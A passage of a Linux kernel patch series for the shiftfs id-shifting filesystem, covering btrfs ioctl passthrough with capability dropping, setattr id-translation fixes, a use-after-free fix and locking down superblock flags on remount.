++		 * mount back to the original mark mount. This is more
++		 * efficient and alleviates concerns about stack depth.
+ 		 */
++		if (lower_sb->s_magic == SHIFTFS_MAGIC) {
++			sbinfo_mp = lower_sb->s_fs_info;
++
++			/* Doesn't make sense to mark a mark mount */
++			if (sbinfo_mp->mark) {
++				err = -EINVAL;
++				goto out_put_path;
++			}
++
++			if (!passthrough_is_subset(sbinfo_mp->passthrough,
++						   sbinfo->passthrough)) {
++				err = -EPERM;
++				goto out_put_path;
++			}
++
++			sbinfo->mnt = mntget(sbinfo_mp->mnt);
++			dentry = dget(path.dentry->d_fsdata);
++		} else {
++			sbinfo->mnt = mntget(path.mnt);
++			dentry = dget(path.dentry);
++		}
++
++		sbinfo->creator_cred = prepare_creds();
++		if (!sbinfo->creator_cred) {
++			err = -ENOMEM;
++			goto out_put_path;
++		}
++	} else {
++		/*
++		 * This leg executes if we're admin capable in the namespace,
++		 * so be very careful.
++		 */
++		err = -EPERM;
+ 		if (path.dentry->d_sb->s_magic != SHIFTFS_MAGIC)
+-			goto out_put;
+-		mp_ssi = path.dentry->d_sb->s_fs_info;
+-		if (!mp_ssi->mark)
+-			goto out_put;
+-		ssi->mnt = mntget(mp_ssi->mnt);
++			goto out_put_path;
++
++		sbinfo_mp = path.dentry->d_sb->s_fs_info;
++		if (!sbinfo_mp->mark)
++			goto out_put_path;
++
++		if (!passthrough_is_subset(sbinfo_mp->passthrough,
++					   sbinfo->passthrough))
++			goto out_put_path;
++
++		sbinfo->mnt = mntget(sbinfo_mp->mnt);
++		sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred);
+ 		dentry = dget(path.dentry->d_fsdata);
+-		path_put(&path);
++		sbinfo->info_mark = sbinfo_mp;
++	}
++
++	sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1;
++	if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
++		printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n");
++		err = -EINVAL;
++		goto out_put_path;
++	}
++
++	inode = new_inode(sb);
++	if (!inode) {
++		err = -ENOMEM;
++		goto out_put_path;
+ 	}
+-	ssi->userns = get_user_ns(dentry->d_sb->s_user_ns);
+-	sb->s_fs_info = ssi;
++	shiftfs_fill_inode(inode, dentry->d_inode->i_ino, S_IFDIR, 0, dentry);
++
++	ihold(dentry->d_inode);
++	inode->i_private = dentry->d_inode;
++
+ 	sb->s_magic = SHIFTFS_MAGIC;
+ 	sb->s_op = &shiftfs_super_ops;
+ 	sb->s_xattr = shiftfs_xattr_handlers;
+ 	sb->s_d_op = &shiftfs_dentry_ops;
+-	sb->s_root = d_make_root(shiftfs_new_inode(sb, S_IFDIR, dentry));
++	sb->s_flags |= SB_POSIXACL;
++	sb->s_root = d_make_root(inode);
++	if (!sb->s_root) {
++		err = -ENOMEM;
++		goto out_put_path;
++	}
++
+ 	sb->s_root->d_fsdata = dentry;
++	sbinfo->userns = get_user_ns(dentry->d_sb->s_user_ns);
++	shiftfs_copyattr(dentry->d_inode, sb->s_root->d_inode);
+ 
+-	return 0;
++	dentry = NULL;
++	err = 0;
+ 
+- out_put:
++out_put_path:
+ 	path_put(&path);
+- out:
++
++out_free_name:
+ 	kfree(name);
+-	kfree(ssi);
++
++	dput(dentry);
++
+ 	return err;
+ }
+ 
+@@ -764,17 +1869,26 @@ static struct file_system_type shiftfs_type = {
+ 
+ static int __init shiftfs_init(void)
+ {
++	shiftfs_file_info_cache = kmem_cache_create(
++		"shiftfs_file_info_cache", sizeof(struct shiftfs_file_info), 0,
++		SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
++	if (!shiftfs_file_info_cache)
++		return -ENOMEM;
++
+ 	return register_filesystem(&shiftfs_type);
+ }
+ 
+ static void __exit shiftfs_exit(void)
+ {
+ 	unregister_filesystem(&shiftfs_type);
++	kmem_cache_destroy(shiftfs_file_info_cache);
+ }
+ 
+ MODULE_ALIAS_FS("shiftfs");
+ MODULE_AUTHOR("James Bottomley");
+-MODULE_DESCRIPTION("uid/gid shifting bind filesystem");
++MODULE_AUTHOR("Seth Forshee <seth.forshee@canonical.com>");
++MODULE_AUTHOR("Christian Brauner <christian.brauner@ubuntu.com>");
++MODULE_DESCRIPTION("id shifting filesystem");
+ MODULE_LICENSE("GPL v2");
+ module_init(shiftfs_init)
+ module_exit(shiftfs_exit)
+-- 
+2.39.2
+
+From a2e0843dcd21746dfc23df95ab8c93af942fac6b Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Thu, 4 Apr 2019 15:39:13 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support some btrfs ioctls
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1823186
+
+Shiftfs currently only passes through a few ioctl()s to the underlay. These
+are ioctl()s that are generally considered safe. Doing it for random
+ioctl()s would be a security issue: permissions for ioctl()s are not
+checked before the filesystem gets involved, so if we were to override
+credentials we could, e.g., do a btrfs tree search in the underlay which we
+normally wouldn't be allowed to do.
+
+However, the btrfs filesystem allows unprivileged users to perform various
+operations through its ioctl() interface. With shiftfs these ioctl()s
+currently do not work. To not regress users that expect btrfs ioctl()s to
+work in unprivileged containers, we can create a whitelist of ioctl()s that
+we allow through to the underlay and for which we also switch credentials.
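+
+Condensed from the diff below, the resulting dispatch in shiftfs_ioctl()
+amounts to the following (a sketch, not the verbatim hunk):
+
+ 	switch (cmd) {
+ 	case FS_IOC_GETVERSION:
+ 	case FS_IOC_GETFLAGS:
+ 	case FS_IOC_SETFLAGS:
+ 		/* generic ioctls, always passed through */
+ 		break;
+ 	default:
+ 		/* btrfs ioctls: only if whitelisted and passthrough is on */
+ 		if (!in_ioctl_whitelist(cmd) ||
+ 		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
+ 			return -ENOTTY;
+ 	}
+
+ 	return shiftfs_real_ioctl(file, cmd, arg);
+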
+The main problem is how we switch credentials. Since permission checks for
+ioctl()s are done by the actual file system and not by the vfs, this would
+mean that any additional capable(<cap>)-based checks done by the filesystem
+would unconditionally pass after we switch credentials. So to make
+credential switching safe we drop *all* capabilities when switching
+credentials. This means that only inode-based permission checks will pass.
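+
+A minimal sketch of that idea (it mirrors the shiftfs_override_ioctl_creds()
+helper in the diff below; the standalone helper name here is illustrative):
+
+ static int override_creds_capless(const struct cred **old)
+ {
+ 	struct cred *new = prepare_creds();
+
+ 	if (!new)
+ 		return -ENOMEM;
+
+ 	/* drop every capability set so capable() checks in the
+ 	 * lower filesystem can no longer succeed */
+ 	cap_clear(new->cap_bset);
+ 	cap_clear(new->cap_effective);
+ 	cap_clear(new->cap_inheritable);
+ 	cap_clear(new->cap_permitted);
+
+ 	*old = override_creds(new);
+ 	put_cred(new);
+ 	return 0;
+ }
+
+The caller pairs this with revert_creds(*old) once the ioctl on the lower
+filesystem has returned.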
+
+Btrfs also allows unprivileged users to delete snapshots when the
+filesystem is mounted with the user_subvol_rm_allowed mount option or if
+the caller is capable(CAP_SYS_ADMIN). The latter should never be the case
+with unprivileged users. To make sure we only allow removal of snapshots
+in the former case we drop all capabilities (see above) when switching
+credentials.
+
+Additionally, btrfs allows the creation of snapshots. To make this work we
+need to be (too) clever. When doing snapshots btrfs requires that an fd to
+the directory the snapshot is supposed to be created in be passed along.
+This fd obviously references a shiftfs file and as such a shiftfs dentry
+and inode. This will cause btrfs to yell EXDEV. To circumvent this problem
+we need to silently and temporarily replace the passed-in fd with an fd
+that refers to a file that references a btrfs dentry and inode.
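+
+A simplified sketch of that fd round trip (error handling and the v2
+argument variant elided; this condenses the fd replace/restore helpers in
+the diff below):
+
+ 	v = memdup_user(arg, sizeof(*v));		/* copy in the args */
+ 	oldfd = v->fd;					/* shiftfs-backed fd */
+ 	src = fdget(oldfd);
+ 	shiftfs_real_fdget(src.file, &lfd);		/* lower btrfs file */
+ 	newfd = get_unused_fd_flags(lfd.file->f_flags);
+ 	fd_install(newfd, lfd.file);			/* btrfs-backed fd */
+ 	v->fd = newfd;
+ 	copy_to_user(arg, v, sizeof(*v));		/* btrfs sees its own fd */
+ 	/* ... vfs_ioctl() on the lower file ... */
+ 	v->fd = oldfd;
+ 	copy_to_user(arg, v, sizeof(*v));		/* restore caller's view */
+ 	__close_fd(current->files, newfd);		/* drop temporary fd */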
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 156 +++++++++++++++++++++++++++++++++++++++++++++++++--
+ 1 file changed, 151 insertions(+), 5 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index ad1ae5bce6c1..678cad30f4a5 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1,6 +1,8 @@
++#include <linux/btrfs.h>
+ #include <linux/capability.h>
+ #include <linux/cred.h>
+ #include <linux/mount.h>
++#include <linux/fdtable.h>
+ #include <linux/file.h>
+ #include <linux/fs.h>
+ #include <linux/namei.h>
+@@ -41,7 +43,21 @@ static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
+ 
+ #define SHIFTFS_PASSTHROUGH_NONE 0
+ #define SHIFTFS_PASSTHROUGH_STAT 1
+-#define SHIFTFS_PASSTHROUGH_ALL (SHIFTFS_PASSTHROUGH_STAT)
++#define SHIFTFS_PASSTHROUGH_IOCTL 2
++#define SHIFTFS_PASSTHROUGH_ALL                                                \
++	(SHIFTFS_PASSTHROUGH_STAT | SHIFTFS_PASSTHROUGH_IOCTL)
++
++static inline bool shiftfs_passthrough_ioctls(struct shiftfs_super_info *info)
++{
++	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
++		return false;
++
++	if (info->info_mark &&
++	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
++		return false;
++
++	return true;
++}
+ 
+ static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info)
+ {
+@@ -1345,18 +1361,120 @@ static inline void shiftfs_revert_ioctl_creds(const struct cred *oldcred,
+ 	return shiftfs_revert_object_creds(oldcred, newcred);
+ }
+ 
++static inline bool is_btrfs_snap_ioctl(int cmd)
++{
++	if ((cmd == BTRFS_IOC_SNAP_CREATE) || (cmd == BTRFS_IOC_SNAP_CREATE_V2))
++		return true;
++
++	return false;
++}
++
++static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
++					  void __user *arg,
++					  struct btrfs_ioctl_vol_args *v1,
++					  struct btrfs_ioctl_vol_args_v2 *v2)
++{
++	int ret;
++
++	if (!is_btrfs_snap_ioctl(cmd))
++		return 0;
++
++	if (cmd == BTRFS_IOC_SNAP_CREATE)
++		ret = copy_to_user(arg, v1, sizeof(*v1));
++	else
++		ret = copy_to_user(arg, v2, sizeof(*v2));
++
++	fdput(lfd);
++	__close_fd(current->files, fd);
++	kfree(v1);
++	kfree(v2);
++
++	return ret;
++}
++
++static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
++					  struct btrfs_ioctl_vol_args **b1,
++					  struct btrfs_ioctl_vol_args_v2 **b2,
++					  struct fd *lfd,
++					  int *newfd)
++{
++	int oldfd, ret;
++	struct fd src;
++	struct btrfs_ioctl_vol_args *v1 = NULL;
++	struct btrfs_ioctl_vol_args_v2 *v2 = NULL;
++
++	if (!is_btrfs_snap_ioctl(cmd))
++		return 0;
++
++	if (cmd == BTRFS_IOC_SNAP_CREATE) {
++		v1 = memdup_user(arg, sizeof(*v1));
++		if (IS_ERR(v1))
++			return PTR_ERR(v1);
++		oldfd = v1->fd;
++		*b1 = v1;
++	} else {
++		v2 = memdup_user(arg, sizeof(*v2));
++		if (IS_ERR(v2))
++			return PTR_ERR(v2);
++		oldfd = v2->fd;
++		*b2 = v2;
++	}
++
++	src = fdget(oldfd);
++	if (!src.file)
++		return -EINVAL;
++
++	ret = shiftfs_real_fdget(src.file, lfd);
++	fdput(src);
++	if (ret)
++		return ret;
++
++	*newfd = get_unused_fd_flags(lfd->file->f_flags);
++	if (*newfd < 0) {
++		fdput(*lfd);
++		return *newfd;
++	}
++
++	fd_install(*newfd, lfd->file);
++
++	if (cmd == BTRFS_IOC_SNAP_CREATE) {
++		v1->fd = *newfd;
++		ret = copy_to_user(arg, v1, sizeof(*v1));
++		v1->fd = oldfd;
++	} else {
++		v2->fd = *newfd;
++		ret = copy_to_user(arg, v2, sizeof(*v2));
++		v2->fd = oldfd;
++	}
++
++	if (ret)
++		shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
++
++	return ret;
++}
++
+ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
+ 			       unsigned long arg)
+ {
+-	long ret = 0;
+ 	struct fd lowerfd;
+ 	struct cred *newcred;
+ 	const struct cred *oldcred;
++	int newfd = -EBADF;
++	long err = 0, ret = 0;
++	void __user *argp = (void __user *)arg;
++	struct fd btrfs_lfd = {};
+ 	struct super_block *sb = file->f_path.dentry->d_sb;
++	struct btrfs_ioctl_vol_args *btrfs_v1 = NULL;
++	struct btrfs_ioctl_vol_args_v2 *btrfs_v2 = NULL;
++
++	ret = shiftfs_btrfs_ioctl_fd_replace(cmd, argp, &btrfs_v1, &btrfs_v2,
++					     &btrfs_lfd, &newfd);
++	if (ret < 0)
++		return ret;
+ 
+ 	ret = shiftfs_real_fdget(file, &lowerfd);
+ 	if (ret)
+-		return ret;
++		goto out_restore;
+ 
+ 	ret = shiftfs_override_ioctl_creds(sb, &oldcred, &newcred);
+ 	if (ret)
+@@ -1372,9 +1490,33 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
+ out_fdput:
+ 	fdput(lowerfd);
+ 
++out_restore:
++	err = shiftfs_btrfs_ioctl_fd_restore(cmd, btrfs_lfd, newfd, argp,
++					     btrfs_v1, btrfs_v2);
++	if (!ret)
++		ret = err;
++
+ 	return ret;
+ }
+ 
++static bool in_ioctl_whitelist(int flag)
++{
++	switch (flag) {
++	case BTRFS_IOC_SNAP_CREATE:
++		return true;
++	case BTRFS_IOC_SNAP_CREATE_V2:
++		return true;
++	case BTRFS_IOC_SUBVOL_CREATE:
++		return true;
++	case BTRFS_IOC_SUBVOL_CREATE_V2:
++		return true;
++	case BTRFS_IOC_SNAP_DESTROY:
++		return true;
++	}
++
++	return false;
++}
++
+ static long shiftfs_ioctl(struct file *file, unsigned int cmd,
+ 			  unsigned long arg)
+ {
+@@ -1386,7 +1528,9 @@ static long shiftfs_ioctl(struct file *file, unsigned int cmd,
+ 	case FS_IOC_SETFLAGS:
+ 		break;
+ 	default:
+-		return -ENOTTY;
++		if (!in_ioctl_whitelist(cmd) ||
++		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
++			return -ENOTTY;
+ 	}
+ 
+ 	return shiftfs_real_ioctl(file, cmd, arg);
+@@ -1403,7 +1547,9 @@ static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd,
+ 	case FS_IOC32_SETFLAGS:
+ 		break;
+ 	default:
+-		return -ENOIOCTLCMD;
++		if (!in_ioctl_whitelist(cmd) ||
++		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
++			return -ENOIOCTLCMD;
+ 	}
+ 
+ 	return shiftfs_real_ioctl(file, cmd, arg);
+-- 
+2.39.2
+
+From 7e64c9484f2524943cde1164852c1888312c010f Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Thu, 11 Apr 2019 07:31:04 -0500
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: use translated ids when changing lower
+ fs attrs
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1824350
+
+shiftfs_setattr() is preparing a new set of attributes with the
+owner translated for the lower fs, but it then passes the
+original attrs. As a result the owner is set to the untranslated
+owner, which causes the shiftfs inodes to also have incorrect
+ids. For example:
+
+ # mkdir dir
+ # touch file
+ # ls -lh dir file
+ drwxr-xr-x 2 root root 4.0K Apr 11 13:05 dir
+ -rw-r--r-- 1 root root 0 Apr 11 13:05 file
+ # chown 500:500 dir file
+ # ls -lh dir file
+ drwxr-xr-x 2 1000500 1000500 4.0K Apr 11 12:42 dir
+ -rw-r--r-- 1 1000500 1000500 0 Apr 11 12:42 file
+
+Fix this to pass the correct iattr struct to notify_change().
+
+Reviewed-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com>
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 678cad30f4a5..e736fd6afcb4 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -779,7 +779,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ 
+ 	inode_lock(loweri);
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = notify_change(lowerd, attr, NULL);
++	err = notify_change(lowerd, &newattr, NULL);
+ 	revert_creds(oldcred);
+ 	inode_unlock(loweri);
+ 
+-- 
+2.39.2
+
+From 84e09374dce45b2aaec7e719acd209b1e5e4ae85 Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Sat, 13 Apr 2019 14:41:01 -0500
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix passing of attrs to underlay for
+ setattr
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1824717
+
+shiftfs_setattr() makes a copy of the attrs it was passed to pass
+to the lower fs. It then calls setattr_prepare() with the original
+attrs, and this may make changes which are not reflected in the
+attrs passed to the lower fs. To fix this, copy the attrs to the
+new struct for the lower fs after calling setattr_prepare().
+
+Additionally, notify_change() may have set ATTR_MODE when one of
+ATTR_KILL_S[UG]ID is set, and passing this combination to
+notify_change() will trigger a BUG(). Do as overlayfs and
+ecryptfs both do, and clear ATTR_MODE if either of those bits
+is set.
+
+Reviewed-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Marcelo Henrique Cerri <marcelo.cerri@canonical.com>
+Acked-by: Brad Figg <brad.figg@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 10 +++++++++-
+ 1 file changed, 9 insertions(+), 1 deletion(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index e736fd6afcb4..8e064756ea0c 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -765,7 +765,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ {
+ 	struct dentry *lowerd = dentry->d_fsdata;
+ 	struct inode *loweri = lowerd->d_inode;
+-	struct iattr newattr = *attr;
++	struct iattr newattr;
+ 	const struct cred *oldcred;
+ 	struct super_block *sb = dentry->d_sb;
+ 	int err;
+@@ -774,9 +774,17 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ 	if (err)
+ 		return err;
+ 
++	newattr = *attr;
+ 	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
+ 	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
+ 
++	/*
++	 * mode change is for clearing setuid/setgid bits. Allow lower fs
++	 * to interpret this in its own way.
++	 */
++	if (newattr.ia_valid & (ATTR_KILL_SUID|ATTR_KILL_SGID))
++		newattr.ia_valid &= ~ATTR_MODE;
++
+ 	inode_lock(loweri);
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+ 	err = notify_change(lowerd, &newattr, NULL);
+-- 
+2.39.2
+
+From a3ba10b3019139566fa65c351966ca3482c90819 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Mon, 15 Apr 2019 15:21:55 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent use-after-free when verifying
+ mount options
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1824735
+
+Copy up the passthrough mount settings of the mark mount point to the
+shiftfs overlay.
+
+Before this commit we used to keep a reference to the shiftfs mark
+mount's shiftfs_super_info which was stashed in the superblock of the
+mark mount. The problem is that we only take a reference to the mount of
+the underlay, i.e. the filesystem that is *under* the shiftfs mark
+mount. This means when someone performs a shiftfs mark mount, then a
+shiftfs overlay mount, and then immediately unmounts the shiftfs mark
+mount, we muck with invalid memory, since shiftfs_put_super might have
+already been called, freeing that memory.
+
+Another solution would be to start reference counting. But this would be
+overkill. We only care about the passthrough mount option of the mark
+mount. And we only need it to verify that on remount the new passthrough
+options of the shiftfs overlay are a subset of the mark mount's
+passthrough options. In other scenarios we don't care. So copying up is
+good enough and also only needs to happen once on mount, i.e. when a new
+superblock is created and the .fill_super method is called.
+
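+For context, the subset check relied on at remount time is roughly the
+following (a sketch of the existing helper, not part of this hunk):
+
+ /* new passthrough flags must be a subset of the mark mount's flags */
+ static inline bool passthrough_is_subset(int old_flags, int new_flags)
+ {
+ 	if ((new_flags & old_flags) != new_flags)
+ 		return false;
+
+ 	return true;
+ }
+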
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Seth Forshee <seth.forshee@canonical.com>
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 29 ++++++++++++++++++-----------
+ 1 file changed, 18 insertions(+), 11 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 8e064756ea0c..4c8a6ec2a617 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -28,7 +28,7 @@ struct shiftfs_super_info {
+ 	const struct cred *creator_cred;
+ 	bool mark;
+ 	unsigned int passthrough;
+-	struct shiftfs_super_info *info_mark;
++	unsigned int passthrough_mark;
+ };
+ 
+ struct shiftfs_file_info {
+@@ -52,10 +52,6 @@ static inline bool shiftfs_passthrough_ioctls(struct shiftfs_super_info *info)
+ 	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
+ 		return false;
+ 
+-	if (info->info_mark &&
+-	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
+-		return false;
+-
+ 	return true;
+ }
+ 
+@@ -64,10 +60,6 @@ static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info)
+ 	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_STAT))
+ 		return false;
+ 
+-	if (info->info_mark &&
+-	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_STAT))
+-		return false;
+-
+ 	return true;
+ }
+ 
+@@ -1824,7 +1816,7 @@ static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
+ 
+ 	if (info->passthrough != new.passthrough) {
+ 		/* Don't allow exceeding passthrough options of mark mount. */
+-		if (!passthrough_is_subset(info->info_mark->passthrough,
++		if (!passthrough_is_subset(info->passthrough_mark,
+ 					   info->passthrough))
+ 			return -EPERM;
+ 
+@@ -1926,9 +1918,19 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 
+ 			sbinfo->mnt = mntget(sbinfo_mp->mnt);
+ 			dentry = dget(path.dentry->d_fsdata);
++			/*
++			 * Copy up the passthrough mount options from the
++			 * parent mark mountpoint.
++			 */
++			sbinfo->passthrough_mark = sbinfo_mp->passthrough_mark;
+ 		} else {
+ 			sbinfo->mnt = mntget(path.mnt);
+ 			dentry = dget(path.dentry);
++			/*
++			 * For a new mark passthrough_mark and passthrough
++			 * are identical.
++			 */
++			sbinfo->passthrough_mark = sbinfo->passthrough;
+ 		}
+ 
+ 		sbinfo->creator_cred = prepare_creds();
+@@ -1956,7 +1958,12 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 		sbinfo->mnt = mntget(sbinfo_mp->mnt);
+ 		sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred);
+ 		dentry = dget(path.dentry->d_fsdata);
+-		sbinfo->info_mark = sbinfo_mp;
++		/*
++		 * Copy up passthrough settings from mark mountpoint so we can
++		 * verify when the overlay wants to remount with different
++		 * passthrough settings.
++		 */
++		sbinfo->passthrough_mark = sbinfo_mp->passthrough;
+ 	}
+ 
+ 	sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1;
+-- 
+2.39.2
+
+From a6ec1bf679d71f552f3eee7bf2b5458a6ea71e9a Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Tue, 16 Apr 2019 18:29:00 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: use separate llseek method for
+ directories
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1824812
+
+Give shiftfs its own proper llseek method for directories.
+
+Before this commit we used to rely on an llseek method targeted at
+regular files for both directories and regular files.
+However, the realfile's f_pos was not correctly handled when userspace
+called lseek(2) on a shiftfs directory file. Give directories their
+own llseek operation so that seeking on a directory file is properly
+supported.
+
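+As a rough userspace illustration (not part of the patch; the path is
+made up), rewinding a shiftfs directory now works as expected:
+
+ #include <fcntl.h>
+ #include <unistd.h>
+ #include <err.h>
+
+ int main(void) {
+ 	int fd = open("mnt/shiftfs/dir", O_RDONLY | O_DIRECTORY);
+ 	if (fd == -1) err(1, "open dir");
+ 	/* ... consume entries with getdents64() ... */
+ 	if (lseek(fd, 0, SEEK_SET) == -1) /* rewinds the realfile's f_pos */
+ 		err(1, "lseek");
+ 	return 0;
+ }
+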
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Seth Forshee <seth.forshee@canonical.com>
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 14 +++++++++++---
+ 1 file changed, 11 insertions(+), 3 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 4c8a6ec2a617..9771165d1ce0 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1144,7 +1144,15 @@ static int shiftfs_release(struct inode *inode, struct file *file)
+ 	return 0;
+ }
+ 
+-static loff_t shiftfs_llseek(struct file *file, loff_t offset, int whence)
++static loff_t shiftfs_dir_llseek(struct file *file, loff_t offset, int whence)
++{
++	struct shiftfs_file_info *file_info = file->private_data;
++	struct file *realfile = file_info->realfile;
++
++	return vfs_llseek(realfile, offset, whence);
++}
++
++static loff_t shiftfs_file_llseek(struct file *file, loff_t offset, int whence)
+ {
+ 	struct inode *realinode = file_inode(file)->i_private;
+ 
+@@ -1653,7 +1661,7 @@ static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx)
+ const struct file_operations shiftfs_file_operations = {
+ 	.open			= shiftfs_open,
+ 	.release		= shiftfs_release,
+-	.llseek			= shiftfs_llseek,
++	.llseek			= shiftfs_file_llseek,
+ 	.read_iter		= shiftfs_read_iter,
+ 	.write_iter		= shiftfs_write_iter,
+ 	.fsync			= shiftfs_fsync,
+@@ -1670,7 +1678,7 @@ const struct file_operations shiftfs_dir_operations = {
+ 	.compat_ioctl		= shiftfs_compat_ioctl,
+ 	.fsync			= shiftfs_fsync,
+ 	.iterate_shared		= shiftfs_iterate_shared,
+-	.llseek			= shiftfs_llseek,
++	.llseek			= shiftfs_dir_llseek,
+ 	.open			= shiftfs_open,
+ 	.read			= generic_read_dir,
+ 	.release		= shiftfs_release,
+-- 
+2.39.2
+
+From 10c6312a5c1cd2fbbbcb47adf7597e8cb2e18391 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Wed, 8 May 2019 14:13:14 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: lock down certain superblock flags
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1827122
+
+This locks down various superblock flags to prevent userns-root from
+remounting a superblock with less restrictive options than the original
+mark or underlay mount.
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 47 ++++++++++++++++++++++++++++++++++++++++++++++-
+ 1 file changed, 46 insertions(+), 1 deletion(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 9771165d1ce0..a1dae7ea593b 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1808,6 +1808,33 @@ static inline bool passthrough_is_subset(int old_flags, int new_flags)
+ 	return true;
+ }
+ 
++static int shiftfs_super_check_flags(unsigned long old_flags,
++				     unsigned long new_flags)
++{
++	if ((old_flags & SB_RDONLY) && !(new_flags & SB_RDONLY))
++		return -EPERM;
++
++	if ((old_flags & SB_NOSUID) && !(new_flags & SB_NOSUID))
++		return -EPERM;
++
++	if ((old_flags & SB_NODEV) && !(new_flags & SB_NODEV))
++		return -EPERM;
++
++	if ((old_flags & SB_NOEXEC) && !(new_flags & SB_NOEXEC))
++		return -EPERM;
++
